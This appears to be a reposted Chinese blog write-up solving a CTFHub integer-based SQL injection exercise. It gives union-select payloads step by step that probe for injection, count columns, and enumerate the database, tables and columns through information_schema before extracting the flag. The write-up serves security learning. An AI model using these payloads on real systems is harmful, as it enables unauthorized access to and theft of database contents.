当前位置:首页 » 《休闲阅读》 » 正文

CTFHUB_web_sql整数型注入_JYSNkai的博客

22 人参与  2022年01月02日 16:15  分类 : 《休闲阅读》  评论

点击全文阅读


 

手动解题步骤

1. 检查是否存在注入

and 1=1 #返回正确  
and 1=2 #返回错误

 

 存在

2. 猜字段数 得出字段数

1 order by 1
1 order by 2
1 order by 3

 

可以看出存在俩个字段

3. 爆数据库名

-1 union select user(),database()

## -1是为了前面部分查询无结果,从而显示后面union的查询结果

 得到数据库名称sqli

4. 爆表名

-1 union select 999,group_concat(table_name)from information_schema.tables where table_schema='sqli'

 得到表名 news,flag

5. 爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

 得到字段名flag

6. 获得flag

-1 union select 1,group_concat(flag) from sqli.flag

 

 


点击全文阅读


本文链接:http://zhangshiyu.com/post/32552.html

字段  返回  数据库  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 完结文重生后我让校花保管所有准考证完结+结局+番外宝藏美文列表_完结文重生后我让校花保管所有准考证完结+结局+番外宝藏美文(秦雨然江述怀洛瑶)
  • 重生在高考前,我笑着送小青梅和小混混去庆祝成人礼一口气读完乔念沈晏安陆坤完本_重生在高考前,我笑着送小青梅和小混混去庆祝成人礼一口气读完(乔念沈晏安陆坤)
  • 此后锦书休寄免费品鉴(阮时苒厉寒霆),此后锦书休寄免费品鉴
  • 高分_玩笑沦陷小说(宋予柯奕烜)(玩笑沦陷)全本完整阅读
  • 离婚后,假千金她成了万人迷是什么小说(江浸月陆明渊)(离婚后,假千金她成了万人迷)全本完整清爽版在线+无广告结局
  • 晚晚的重生回到全家被杀的除夕夜+整本林炎晚晚全书在线
  • 独家贺青芷姜亦恒无删减(忽闻弦歌落)(贺青芷姜亦恒)TXT免费版阅读
  • 全书浏览闻说爱意忽已晚(林舒晚楚寒屿)_闻说爱意忽已晚(林舒晚楚寒屿)全书结局
  • 休寄锦书诉衷肠江揽月季明轩完本_休寄锦书诉衷肠(江揽月季明轩)
  • 梁艺诗江铭柯(有些事情像是上天给她的补偿)+前传(梁艺诗江铭柯):结局+番外评价五颗星
  • 全书浏览穿成商王的白月光后,系统带我大逃杀(林虞江江)_穿成商王的白月光后,系统带我大逃杀(林虞江江)全书结局
  • 流光错系断蓬之舟免费+后续(沈煜谢晚烟)

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1